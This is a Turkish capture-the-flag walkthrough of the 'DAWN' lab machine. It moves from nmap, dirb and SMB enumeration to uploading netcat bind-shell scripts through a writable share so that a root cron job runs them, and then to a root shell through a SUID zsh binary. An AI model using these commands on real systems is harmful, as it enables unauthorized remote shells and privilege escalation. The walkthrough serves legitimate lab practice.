      ####enumeration
      ####Nmap
nmap ile Tüm TCP bağlantı noktalarına karşı bir tarama çalıştırarak başlıyoruz :
kali@kali:~$ sudo nmap -p- $targetip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 11:47 EDT
Nmap scan report for $targetip
Host is up (0.036s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
Keşfedilen bağlantı noktalarına karşı agresif bir tarama yapalım:
kali@kali:~$ sudo nmap -A -p 80,139,445,3306 $targetip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 11:50 EDT
Nmap scan report for $targetip
Host is up (0.032s latency).

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 12
|   Capabilities flags: 63486
|   Some Capabilities: ConnectWithDatabase, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, SupportsCompression, Speaks41ProtocolOld, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, Support41Auth, LongColumnFlag, FoundRows, InteractiveClient, SupportsLoadDataLocal, IgnoreSigpipes, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: {n7f}`K4bp08k4\Use!o
|_  Auth Plugin Name: mysql_native_password
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.10 - 3.12 (93%), Linux 4.0 (92%), Linux 4.9 (92%), Linux 2.6.18 (91%), Linux 3.10 - 3.16 (91%), Linux 3.10 - 4.11 (90%), Linux 3.11 - 4.1 (90%), Linux 3.2 - 4.9 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DAWN

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
|_  System time: 2020-03-16T11:50:40-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-16T15:50:40
|_  start_date: N/A

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   37.08 ms $trace1
2   37.23 ms $trace2

      ####Web Enumeration
80 numaralı bağlantı noktasındaki (http://$targetip/) varsayılan sayfaya gittiğimizde "kullanılamıyor" mesajı görüyoruz:
Website currently under construction, try again later.
dirbWeb sitesine karşı kullanmak /logs/ dizinini ortaya çıkarır:
kali@kali:~$ dirb http://$targetip/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Mar 16 11:53:33 2020
URL_BASE: http://$targetip/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://$targetip/ ----
+ http://$targetip/index.html (CODE:200|SIZE:791)                                                           
==> DIRECTORY: http://$targetip/logs/                                                                       
+ http://$targetip/server-status (CODE:403|SIZE:302)                                                        
                                                                                                                 
---- Entering directory: http://$targetip/logs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Mar 16 11:55:55 2020
DOWNLOADED: 4612 - FOUND: 2
Orada gezinirken (http://$targetip/logs/) şunu görüyoruz: 

auth.log , daemon.log ve error.log günlükleri bizim için yasaktır, ancak management.log dosyasını indirebiliriz . İçinde şunları buluyoruz:
kali@kali:~$ cat management.log 
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

...

2020/03/16 12:19:01 CMD: UID=0    PID=1371   | /usr/sbin/cron -f 
2020/03/16 12:19:01 CMD: UID=0    PID=1370   | /usr/sbin/cron -f 
2020/03/16 12:19:01 CMD: UID=0    PID=1369   | /usr/sbin/cron -f 
2020/03/16 12:19:01 CMD: UID=0    PID=1368   | /usr/sbin/cron -f 
2020/03/16 12:19:01 CMD: UID=0    PID=1367   | /usr/sbin/cron -f 
2020/03/16 12:19:01 CMD: UID=0    PID=1373   | /usr/sbin/CRON -f 
2020/03/16 12:19:01 CMD: UID=0    PID=1372   | /usr/sbin/CRON -f 
2020/03/16 12:19:01 CMD: UID=0    PID=1376   | /usr/sbin/CRON -f 
2020/03/16 12:19:01 CMD: UID=0    PID=1375   | /usr/sbin/CRON -f 
2020/03/16 12:19:01 CMD: UID=1000 PID=1374   | /bin/sh -c /home/dawn/ITDEPT/product-control 
2020/03/16 12:19:01 CMD: UID=1000 PID=1379   | /bin/sh -c /home/dawn/ITDEPT/product-control 
2020/03/16 12:19:01 CMD: UID=0    PID=1378   | /bin/sh -c /home/ganimedes/phobos 
2020/03/16 12:19:01 CMD: UID=0    PID=1377   | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2020/03/16 12:20:01 CMD: UID=0    PID=1386   | /usr/sbin/cron -f 
2020/03/16 12:20:01 CMD: UID=0    PID=1385   | /usr/sbin/cron -f 
2020/03/16 12:20:01 CMD: UID=0    PID=1384   | /usr/sbin/cron -f 
2020/03/16 12:20:01 CMD: UID=0    PID=1383   | /usr/sbin/cron -f 
2020/03/16 12:20:01 CMD: UID=0    PID=1382   | /usr/sbin/cron -f 
2020/03/16 12:20:01 CMD: UID=1000 PID=1395   | /bin/sh -c /home/dawn/ITDEPT/product-control 
2020/03/16 12:20:01 CMD: UID=0    PID=1392   | chmod 777 /home/dawn/ITDEPT/product-control 
2020/03/16 12:20:01 CMD: UID=33   PID=1391   | /bin/sh -c /home/dawn/ITDEPT/web-control

...
ITDEPTH Adlı bir dizinimiz var. Ürün kontrolü ve web kontrolü olmak üzere iki dosya içerir . Bu dosyalardan cron ile bahsedildiği için, bu dosyaların bazı arka plan görevleri tarafından yürütüldüğünü varsayabiliriz.

      ####SMB Enumeration
Nmap bağlantı noktası taramasına geri döndüğümüzde, bir NetBIOS SMB olduğunu bulduk. Bu makinenin SMB Hizmetini sıralayalım:
...
=========================================== 
|    Share Enumeration on $targetip       |
=========================================== 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)

*snip*

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\dawn (Local User)
S-1-22-1-1001 Unix User\ganimedes (Local User)
...
ITDEPT daha önce bulduğumuz dizine sahip olduğumuzu gösterir, yani bu dizine SMB üzerinden erişilebilir. Ayrıca, iki kullanıcı dawnve ganimedes bulundu.

      ####EXPLOITATION

SMB Exloitation
Dizini numaralandırmamızda bulduğumuz ITDEPTiçin, SMB'yi kullanarak ona erişebiliriz (şifre boş):
kali@kali:~$ smbclient //$targetip/ITDEPT
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug  2 23:23:20 2019
  ..                                  D        0  Fri Aug  2 23:21:39 2019

		7158264 blocks of size 1024. 3280572 blocks available
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \>
Bu dizinde hiçbir şey yok, ancak içinde herhangi bir dosya oluşturabiliriz. Daha önce numaralandırmamızda ( product-control ve web-control ) bir cron işi tarafından her dakika yürütülen iki ilginç dosya gördüğümüzü hatırlayarak,
bundan yararlanmaya çalışabiliriz:
kali@kali:~$ echo "nc -lvp 4444 -e /bin/bash &" > product-control
kali@kali:~$ echo "nc -lvp 1337 -e /bin/bash &" > web-control
kali@kali:~$ cat product-control 
nc -lvp 4444 -e /bin/bash &
kali@kali:~$  cat web-control 
nc -lvp 1337 -e /bin/bash &
Şimdi bu dosyaları yüklemek için:
smb: \> put product-control
putting file product-control as \product-control (0.3 kb/s) (average 0.3 kb/s)
smb: \> put web-control
putting file web-control as \web-control (0.3 kb/s) (average 0.3 kb/s)
smb: \> ls
  .                                   D        0  Mon Mar 16 12:47:04 2020
  ..                                  D        0  Fri Aug  2 23:21:39 2019
  web-control                         A       28  Mon Mar 16 12:47:04 2020
  product-control                     A       28  Mon Mar 16 12:46:56 2020

		7158264 blocks of size 1024. 3242988 blocks available
smb: \>
Yüklenen zararlı dosyaların hedef tarafından yürütülmesine izin vermek için bir dakika bekledikten sonra, netcat ile bind kabuklarımızdan birine bağlanabiliriz:
kali@kali:~$ nc -nv $targetip 4444
(UNKNOWN) [$targetip] 4444 (?) open
python -c 'import pty; pty.spawn("/bin/bash")'
dawn@dawn:~$ id
id
uid=1000(dawn) gid=1000(dawn) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
dawn@dawn:~$

      ####Privilege Escalation            
      ####SUİD
İlk olarak, SUID izinlerine sahip herhangi bir dosya olup olmadığını kontrol edeceğiz:
dawn@dawn:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
dawn@dawn:~$
/usr/bin/zsh burada kesinlikle ilginç görünüyor. Köke yükseltmek için kullanabiliriz:
dawn@dawn:~$ whoami
whoami
dawn
dawn@dawn:~$ /usr/bin/zsh
/usr/bin/zsh
dawn# whoami                                                                   
whoami
root                  
